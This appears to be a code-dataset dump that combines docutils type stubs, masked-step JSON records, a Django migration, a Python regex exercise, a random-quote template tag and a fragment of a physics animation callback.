option_spec: Dict[str, Callable[[str], Any]] = ...
class DocutilsDialect(csv.Dialect):
delimiter: str = ...
quotechar: str = ...
doublequote: bool = ...
skipinitialspace: bool = ...
strict: bool = ...
lineterminator: str = ...
quoting: Any = ...
escapechar: str = ...
def __init__(self, options: Dict[str, Any]) -> None: ...
class HeaderDialect(csv.Dialect):
delimiter: str = ...
quotechar: str = ...
escapechar: str = ...
doublequote: bool = ...
skipinitialspace: bool = ...
strict: bool = ...
lineterminator: str = ...
quoting: Any = ...
def check_requirements(self) -> None: ...
def run(self) -> List[Node]: ...
def get_csv_data(self) -> Tuple[List[str], str]: ...
decode_from_csv: Callable[[str], str] = ...
encode_for_csv: Callable[[str], str] = ...
def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any, source: str) -> Tuple[List[Tuple[int, int, int, StringList]], int]: ...
class ListTable(Table):
option_spec: Dict[str, Callable[[str], Any]] = ...
def run(self) -> List[Node]: ...
def check_list_content(self, node: Node) -> Tuple[int, List[int]]: ...
def build_table_from_list(self, table_data: List[List[N_co]], col_widths: List[int], header_rows: int, stub_columns: int) -> table: ...
|
normal
|
{
"blob_id": "9abf2b9b90d18332ede94cf1af778e0dda54330b",
"index": 949,
"step-1": "<mask token>\n\n\nclass RSTTable(Table):\n\n def run(self) ->List[Node]:\n ...\n\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n\n def __init__(self, options: Dict[str, Any]) ->None:\n ...\n\n\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n\n def check_requirements(self) ->None:\n ...\n\n def run(self) ->List[Node]:\n ...\n\n def get_csv_data(self) ->Tuple[List[str], str]:\n ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any,\n source: str) ->Tuple[List[Tuple[int, int, int, StringList]], int]:\n ...\n\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n def run(self) ->List[Node]:\n ...\n\n def check_list_content(self, node: Node) ->Tuple[int, List[int]]:\n ...\n\n def build_table_from_list(self, table_data: List[List[N_co]],\n col_widths: List[int], header_rows: int, stub_columns: int) ->table:\n ...\n",
"step-2": "<mask token>\n\n\nclass Table(Directive):\n optional_arguments: int = ...\n final_argument_whitespace: bool = ...\n option_spec: Dict[str, Callable[[str], Any]] = ...\n has_content: bool = ...\n\n def make_title(self) ->Tuple[title, List[system_message]]:\n ...\n\n def process_header_option(self) ->Tuple[List[Node], int]:\n ...\n\n def check_table_dimensions(self, rows: List[List[N_co]], header_rows:\n int, stub_columns: int) ->None:\n ...\n\n def set_table_width(self, table_node: table) ->None:\n ...\n\n @property\n def widths(self) ->str:\n ...\n\n def get_column_widths(self, max_cols: int) ->List[int]:\n ...\n\n def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple\n [List[N_co], List[N_co]]) ->None:\n ...\n\n\nclass RSTTable(Table):\n\n def run(self) ->List[Node]:\n ...\n\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n\n def __init__(self, options: Dict[str, Any]) ->None:\n ...\n\n\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n\n def check_requirements(self) ->None:\n ...\n\n def run(self) ->List[Node]:\n ...\n\n def get_csv_data(self) ->Tuple[List[str], str]:\n ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any,\n source: str) ->Tuple[List[Tuple[int, int, int, StringList]], int]:\n ...\n\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n def run(self) ->List[Node]:\n ...\n\n def check_list_content(self, node: Node) ->Tuple[int, List[int]]:\n ...\n\n def build_table_from_list(self, table_data: List[List[N_co]],\n col_widths: List[int], header_rows: int, stub_columns: int) ->table:\n ...\n",
"step-3": "<mask token>\n\n\ndef align(argument: str) ->str:\n ...\n\n\nclass Table(Directive):\n optional_arguments: int = ...\n final_argument_whitespace: bool = ...\n option_spec: Dict[str, Callable[[str], Any]] = ...\n has_content: bool = ...\n\n def make_title(self) ->Tuple[title, List[system_message]]:\n ...\n\n def process_header_option(self) ->Tuple[List[Node], int]:\n ...\n\n def check_table_dimensions(self, rows: List[List[N_co]], header_rows:\n int, stub_columns: int) ->None:\n ...\n\n def set_table_width(self, table_node: table) ->None:\n ...\n\n @property\n def widths(self) ->str:\n ...\n\n def get_column_widths(self, max_cols: int) ->List[int]:\n ...\n\n def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple\n [List[N_co], List[N_co]]) ->None:\n ...\n\n\nclass RSTTable(Table):\n\n def run(self) ->List[Node]:\n ...\n\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n\n def __init__(self, options: Dict[str, Any]) ->None:\n ...\n\n\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n\n def check_requirements(self) ->None:\n ...\n\n def run(self) ->List[Node]:\n ...\n\n def get_csv_data(self) ->Tuple[List[str], str]:\n ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any,\n source: str) ->Tuple[List[Tuple[int, int, int, StringList]], int]:\n ...\n\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n def run(self) ->List[Node]:\n ...\n\n def check_list_content(self, node: Node) ->Tuple[int, List[int]]:\n ...\n\n def build_table_from_list(self, table_data: List[List[N_co]],\n col_widths: List[int], header_rows: int, stub_columns: int) ->table:\n ...\n",
"step-4": "<mask token>\nN_co = TypeVar('N_co', bound=Node, covariant=True)\n__docformat__: str\n\n\ndef align(argument: str) ->str:\n ...\n\n\nclass Table(Directive):\n optional_arguments: int = ...\n final_argument_whitespace: bool = ...\n option_spec: Dict[str, Callable[[str], Any]] = ...\n has_content: bool = ...\n\n def make_title(self) ->Tuple[title, List[system_message]]:\n ...\n\n def process_header_option(self) ->Tuple[List[Node], int]:\n ...\n\n def check_table_dimensions(self, rows: List[List[N_co]], header_rows:\n int, stub_columns: int) ->None:\n ...\n\n def set_table_width(self, table_node: table) ->None:\n ...\n\n @property\n def widths(self) ->str:\n ...\n\n def get_column_widths(self, max_cols: int) ->List[int]:\n ...\n\n def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple\n [List[N_co], List[N_co]]) ->None:\n ...\n\n\nclass RSTTable(Table):\n\n def run(self) ->List[Node]:\n ...\n\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n\n def __init__(self, options: Dict[str, Any]) ->None:\n ...\n\n\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n\n def check_requirements(self) ->None:\n ...\n\n def run(self) ->List[Node]:\n ...\n\n def get_csv_data(self) ->Tuple[List[str], str]:\n ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any,\n source: str) ->Tuple[List[Tuple[int, int, int, StringList]], int]:\n ...\n\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n def run(self) ->List[Node]:\n ...\n\n def check_list_content(self, node: Node) ->Tuple[int, List[int]]:\n ...\n\n def build_table_from_list(self, table_data: List[List[N_co]],\n col_widths: List[int], header_rows: int, stub_columns: int) ->table:\n ...\n",
"step-5": "# Stubs for docutils.parsers.rst.directives.tables (Python 3.6)\n#\n# NOTE: This dynamically typed stub was automatically generated by stubgen.\n\nimport csv\nfrom docutils.statemachine import StringList\nfrom docutils.nodes import Node, system_message, table, title\nfrom docutils.parsers.rst import Directive\nfrom typing import Any, Callable, Dict, List, Tuple, TypeVar\n\nN_co = TypeVar('N_co', bound=Node, covariant=True)\n\n__docformat__: str\n\ndef align(argument: str) -> str: ...\n\nclass Table(Directive):\n optional_arguments: int = ...\n final_argument_whitespace: bool = ...\n option_spec: Dict[str, Callable[[str], Any]] = ...\n has_content: bool = ...\n def make_title(self) -> Tuple[title, List[system_message]]: ...\n def process_header_option(self) -> Tuple[List[Node], int]: ...\n def check_table_dimensions(self, rows: List[List[N_co]], header_rows: int, stub_columns: int) -> None: ...\n def set_table_width(self, table_node: table) -> None: ...\n @property\n def widths(self) -> str: ...\n def get_column_widths(self, max_cols: int) -> List[int]: ...\n def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple[List[N_co], List[N_co]]) -> None: ...\n\nclass RSTTable(Table):\n def run(self) -> List[Node]: ...\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n def __init__(self, options: Dict[str, Any]) -> None: ...\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n def check_requirements(self) -> None: ...\n def run(self) -> List[Node]: ...\n def get_csv_data(self) -> Tuple[List[str], str]: ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any, source: str) -> Tuple[List[Tuple[int, int, int, StringList]], int]: ...\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n def run(self) -> List[Node]: ...\n def check_list_content(self, node: Node) -> Tuple[int, List[int]]: ...\n def build_table_from_list(self, table_data: List[List[N_co]], col_widths: List[int], header_rows: int, stub_columns: int) -> table: ...\n",
"step-ids": [
11,
19,
20,
22,
24
]
}
|
[
11,
19,
20,
22,
24
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('books', '0007_auto_20170127_2254')]
operations = [migrations.AlterField(model_name='book', name='subtitle',
field=models.CharField(blank=True, help_text=
'e.g. There and Back Again', max_length=200)), migrations.
AlterField(model_name='book', name='title', field=models.CharField(
db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=
True))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('books', '0007_auto_20170127_2254')]
operations = [migrations.AlterField(model_name='book', name='subtitle',
field=models.CharField(blank=True, help_text=
'e.g. There and Back Again', max_length=200)), migrations.
AlterField(model_name='book', name='title', field=models.CharField(
db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=
True))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-30 14:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('books', '0007_auto_20170127_2254'),
]
operations = [
migrations.AlterField(
model_name='book',
name='subtitle',
field=models.CharField(blank=True, help_text='e.g. There and Back Again', max_length=200),
),
migrations.AlterField(
model_name='book',
name='title',
field=models.CharField(db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=True),
),
]
|
flexible
|
{
"blob_id": "65ea27851d9db0f0a06d42bd37eff633d22a1548",
"index": 9528,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('books', '0007_auto_20170127_2254')]\n operations = [migrations.AlterField(model_name='book', name='subtitle',\n field=models.CharField(blank=True, help_text=\n 'e.g. There and Back Again', max_length=200)), migrations.\n AlterField(model_name='book', name='title', field=models.CharField(\n db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=\n True))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('books', '0007_auto_20170127_2254')]\n operations = [migrations.AlterField(model_name='book', name='subtitle',\n field=models.CharField(blank=True, help_text=\n 'e.g. There and Back Again', max_length=200)), migrations.\n AlterField(model_name='book', name='title', field=models.CharField(\n db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=\n True))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-01-30 14:50\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('books', '0007_auto_20170127_2254'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='book',\n name='subtitle',\n field=models.CharField(blank=True, help_text='e.g. There and Back Again', max_length=200),\n ),\n migrations.AlterField(\n model_name='book',\n name='title',\n field=models.CharField(db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=True),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
###############################################################
## File Name: 11_exercise.py
## File Type: Python File
## Author: surge55
## Course: Python 4 Everybody
## Chapter: Chapter 11 - Regular Expressions
## Excercise: n/a
## Description: Code walkthrough from book
## Other References: associated files in folder
###############################################################
#11.2 Extracting data using regular expressions
# import re
# s = 'A message from csev@umich.edu to cwen@iupui.edu about meeting @2PM'
# lst = re.findall('\S+@\S+', s)
# print(lst)
# We can use this regular expression in a program
# to read all the lines in a file and print out
# anything that looks like an email address:
# import re
# hand = open('mbox-short.txt')
# for line in hand:
# line = line.rstrip()
# x = re.findall('\S+@\S+', line)
# if len(x) > 0:
# print(x)
## Much Cleaner Version
# import re
# hand = open('mbox-short.txt')
# for line in hand:
# line = line.rstrip()
# x = re.findall('[a-zA-Z0-9]\S*@\S*[a-zA-Z]', line)
# if len(x) > 0:
# print(x)
# Search for lines that start with "X" followed by any
# non-whitespace characters and ':'
# followed by a space and any number
# the number can include a decimal
# import re
# hand = open('mbox-short.txt')
# # Returns a List
# # for line in hand:
# # line = line.rstrip()
# # x = re.findall('^X\S*: [0-9.]+', line)
# # if len(x) > 0:
# # print(x)
# # print(type(line))
# # Returnes a String
# for line in hand:
# line = line.rstrip()
# if re.search('^X\S*: [0-9.]+', line):
# print(line)
# # print(type(line))
# Search for lines that start with 'X' followed by any
# non whitespace characters and ':' followed by a space
# and any number. The number can include a decimal
# Then print the number if it is greater than 0
# import re
# hand = open('mbox-short.txt')
# for line in hand:
# line = line.rstrip()
# x = re.findall('^X\S*: ([0-9.]+)', line)
# if len(x) > 0:
# print(x)
# Exercise 1
# Write a simple program to simulate the operation of the grep
# command on unix. Ask the user to enter a regular expression
# and count the nuber of lines that matched the regular expression:
# import re
# reg_inp = input("Enter a regular expression: ")
# count = 0
# hand = open('mbox.txt')
# for line in hand:
# line = line.rstrip()
# if re.search(reg_inp, line):
# count += 1
# print('mbox.txt had', count, 'lines that match', reg_inp)
# Exercise 2
# Write a program to look for lines of the form:
# 'New Revision: 39772'
# Extract the number from each of the lines using a regular expression
# and the findall() method. Compute the average of the numbers
# and print out the average as an integer.
# import re
# hand = open('mbox.txt')
# total = 0
# count = 0
# for line in hand:
# line = line.rstrip()
# x = re.findall('^New Revision: ([0-9]+)', line)
# if len(x) > 0:
# for i in x:
# total = total + float(i)
# count += 1
# print(int(total/count))
# FINDING NUMBERS IN A HAYSTACK
# In this assignment you will read through and parse a file with text and numbers
# You will extract all the numbers in the file and compute the sum
# of the numbers
import re
hand = open('regex_sum_act.txt')
total = 0
count = 0
for line in hand:
line = line.rstrip()
x = re.findall('([0-9]+)', line)
if len(x) > 0:
# print(x)
for i in x:
total += float(i)
print('sum is', int(total))
|
normal
|
{
"blob_id": "860908126d473e6c4ed070992a1b518683fd4c27",
"index": 3275,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in hand:\n line = line.rstrip()\n x = re.findall('([0-9]+)', line)\n if len(x) > 0:\n for i in x:\n total += float(i)\nprint('sum is', int(total))\n",
"step-3": "<mask token>\nhand = open('regex_sum_act.txt')\ntotal = 0\ncount = 0\nfor line in hand:\n line = line.rstrip()\n x = re.findall('([0-9]+)', line)\n if len(x) > 0:\n for i in x:\n total += float(i)\nprint('sum is', int(total))\n",
"step-4": "import re\nhand = open('regex_sum_act.txt')\ntotal = 0\ncount = 0\nfor line in hand:\n line = line.rstrip()\n x = re.findall('([0-9]+)', line)\n if len(x) > 0:\n for i in x:\n total += float(i)\nprint('sum is', int(total))\n",
"step-5": "###############################################################\r\n## File Name: 11_exercise.py\r\n## File Type: Python File\r\n## Author: surge55\r\n## Course: Python 4 Everybody\r\n## Chapter: Chapter 11 - Regular Expressions\r\n## Excercise: n/a\r\n## Description: Code walkthrough from book \r\n## Other References: associated files in folder\r\n###############################################################\r\n\r\n\r\n#11.2 Extracting data using regular expressions\r\n\r\n# import re\r\n# s = 'A message from csev@umich.edu to cwen@iupui.edu about meeting @2PM'\r\n# lst = re.findall('\\S+@\\S+', s)\r\n# print(lst) \r\n\r\n# We can use this regular expression in a program\r\n# to read all the lines in a file and print out\r\n# anything that looks like an email address:\r\n# import re\r\n# hand = open('mbox-short.txt')\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# x = re.findall('\\S+@\\S+', line)\r\n# if len(x) > 0:\r\n# print(x)\r\n\r\n## Much Cleaner Version\r\n# import re\r\n# hand = open('mbox-short.txt')\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# x = re.findall('[a-zA-Z0-9]\\S*@\\S*[a-zA-Z]', line)\r\n# if len(x) > 0:\r\n# print(x)\r\n\r\n# Search for lines that start with \"X\" followed by any\r\n# non-whitespace characters and ':'\r\n# followed by a space and any number\r\n# the number can include a decimal\r\n# import re\r\n# hand = open('mbox-short.txt')\r\n\r\n# # Returns a List\r\n# # for line in hand:\r\n# # line = line.rstrip()\r\n# # x = re.findall('^X\\S*: [0-9.]+', line)\r\n# # if len(x) > 0:\r\n# # print(x)\r\n# # print(type(line))\r\n\r\n# # Returnes a String\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# if re.search('^X\\S*: [0-9.]+', line):\r\n# print(line)\r\n# # print(type(line))\r\n\r\n\r\n\r\n# Search for lines that start with 'X' followed by any\r\n# non whitespace characters and ':' followed by a space\r\n# and any number. The number can include a decimal\r\n# Then print the number if it is greater than 0\r\n\r\n# import re\r\n# hand = open('mbox-short.txt')\r\n\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# x = re.findall('^X\\S*: ([0-9.]+)', line)\r\n# if len(x) > 0:\r\n# print(x)\r\n\r\n\r\n# Exercise 1\r\n# Write a simple program to simulate the operation of the grep\r\n# command on unix. Ask the user to enter a regular expression \r\n# and count the nuber of lines that matched the regular expression:\r\n\r\n# import re\r\n\r\n# reg_inp = input(\"Enter a regular expression: \")\r\n# count = 0\r\n\r\n# hand = open('mbox.txt')\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# if re.search(reg_inp, line):\r\n# count += 1\r\n\r\n# print('mbox.txt had', count, 'lines that match', reg_inp)\r\n\r\n\r\n\r\n# Exercise 2\r\n# Write a program to look for lines of the form:\r\n# 'New Revision: 39772'\r\n# Extract the number from each of the lines using a regular expression\r\n# and the findall() method. Compute the average of the numbers\r\n# and print out the average as an integer.\r\n\r\n# import re\r\n# hand = open('mbox.txt')\r\n# total = 0\r\n# count = 0\r\n\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# x = re.findall('^New Revision: ([0-9]+)', line)\r\n# if len(x) > 0:\r\n# for i in x:\r\n# total = total + float(i)\r\n# count += 1\r\n\r\n# print(int(total/count))\r\n\r\n\r\n# FINDING NUMBERS IN A HAYSTACK\r\n# In this assignment you will read through and parse a file with text and numbers\r\n# You will extract all the numbers in the file and compute the sum\r\n# of the numbers \r\n\r\nimport re\r\nhand = open('regex_sum_act.txt')\r\ntotal = 0\r\ncount = 0\r\n\r\nfor line in hand:\r\n line = line.rstrip()\r\n x = re.findall('([0-9]+)', line)\r\n if len(x) > 0:\r\n # print(x)\r\n for i in x:\r\n total += float(i)\r\n\r\nprint('sum is', int(total))\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import re
f = open('q4text.txt')
text = f.read()
f.close()
pattern = r'''[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\b[A-Z][a-z]+[.]|\b[A-Za-z]+['][a-z]+|[A-Z.]+[A-Z]|\b[A-Za-z-]+|[.]+|[.,'"!?:;]'''
word_token = re.findall(pattern, text)
token_dictionary = {}
for element in word_token:
if element in token_dictionary:
token_dictionary[element] += 1
else:
token_dictionary[element] = 1
for key in sorted(token_dictionary.keys()):
print("{} {}".format(key, token_dictionary[key]))
print('Tokens: ' + str(len(word_token)))
print('Types: ' + str(len(token_dictionary)))
|
normal
|
{
"blob_id": "2e27302abbe239c1a6067a9eb52f5a857fff7dd2",
"index": 1736,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nf.close()\n<mask token>\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n",
"step-3": "<mask token>\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = (\n '[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\\\b[A-Z][a-z]+[.]|\\\\b[A-Za-z]+[\\'][a-z]+|[A-Z.]+[A-Z]|\\\\b[A-Za-z-]+|[.]+|[.,\\'\"!?:;]'\n )\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n",
"step-4": "import re\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = (\n '[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\\\b[A-Z][a-z]+[.]|\\\\b[A-Za-z]+[\\'][a-z]+|[A-Z.]+[A-Z]|\\\\b[A-Za-z-]+|[.]+|[.,\\'\"!?:;]'\n )\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n",
"step-5": "import re\n\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = r'''[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\b[A-Z][a-z]+[.]|\\b[A-Za-z]+['][a-z]+|[A-Z.]+[A-Z]|\\b[A-Za-z-]+|[.]+|[.,'\"!?:;]'''\n\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\n\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\n\nfor key in sorted(token_dictionary.keys()):\n print(\"{} {}\".format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django import template
import random
register = template.Library()
@register.simple_tag
def random_quote():
"""Returns a random quote to be displayed on the community sandwich page"""
quotes = [
"Growth is never by mere chance; it is the result of forces working together.\n-James Cash Penney",
"We cannot accomplish all that we need to do without working together\n-Bill Richardson",
"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Gloria Macapagal Arroyo",
"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Jacqueline Novogratz",
"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\n-Adrianne Palicki",
"Communism will win.\n-Slavoj Zizek",
]
return random.choice(quotes)
|
normal
|
{
"blob_id": "6e73625adc10064cdb1b5f0546a4fc7320e9f5dc",
"index": 8366,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@register.simple_tag\ndef random_quote():\n \"\"\"Returns a random quote to be displayed on the community sandwich page\"\"\"\n quotes = [\n \"\"\"Growth is never by mere chance; it is the result of forces working together.\n-James Cash Penney\"\"\"\n ,\n \"\"\"We cannot accomplish all that we need to do without working together\n-Bill Richardson\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Gloria Macapagal Arroyo\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Jacqueline Novogratz\"\"\"\n ,\n \"\"\"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\n-Adrianne Palicki\"\"\"\n , \"\"\"Communism will win.\n-Slavoj Zizek\"\"\"]\n return random.choice(quotes)\n",
"step-3": "<mask token>\nregister = template.Library()\n\n\n@register.simple_tag\ndef random_quote():\n \"\"\"Returns a random quote to be displayed on the community sandwich page\"\"\"\n quotes = [\n \"\"\"Growth is never by mere chance; it is the result of forces working together.\n-James Cash Penney\"\"\"\n ,\n \"\"\"We cannot accomplish all that we need to do without working together\n-Bill Richardson\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Gloria Macapagal Arroyo\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Jacqueline Novogratz\"\"\"\n ,\n \"\"\"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\n-Adrianne Palicki\"\"\"\n , \"\"\"Communism will win.\n-Slavoj Zizek\"\"\"]\n return random.choice(quotes)\n",
"step-4": "from django import template\nimport random\nregister = template.Library()\n\n\n@register.simple_tag\ndef random_quote():\n \"\"\"Returns a random quote to be displayed on the community sandwich page\"\"\"\n quotes = [\n \"\"\"Growth is never by mere chance; it is the result of forces working together.\n-James Cash Penney\"\"\"\n ,\n \"\"\"We cannot accomplish all that we need to do without working together\n-Bill Richardson\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Gloria Macapagal Arroyo\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Jacqueline Novogratz\"\"\"\n ,\n \"\"\"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\n-Adrianne Palicki\"\"\"\n , \"\"\"Communism will win.\n-Slavoj Zizek\"\"\"]\n return random.choice(quotes)\n",
"step-5": "from django import template\n\nimport random\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef random_quote():\n \"\"\"Returns a random quote to be displayed on the community sandwich page\"\"\"\n quotes = [\n \"Growth is never by mere chance; it is the result of forces working together.\\n-James Cash Penney\",\n \"We cannot accomplish all that we need to do without working together\\n-Bill Richardson\",\n \"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\\n-Gloria Macapagal Arroyo\",\n \"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\\n-Jacqueline Novogratz\",\n \"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\\n-Adrianne Palicki\",\n \"Communism will win.\\n-Slavoj Zizek\",\n ]\n return random.choice(quotes)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0:
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
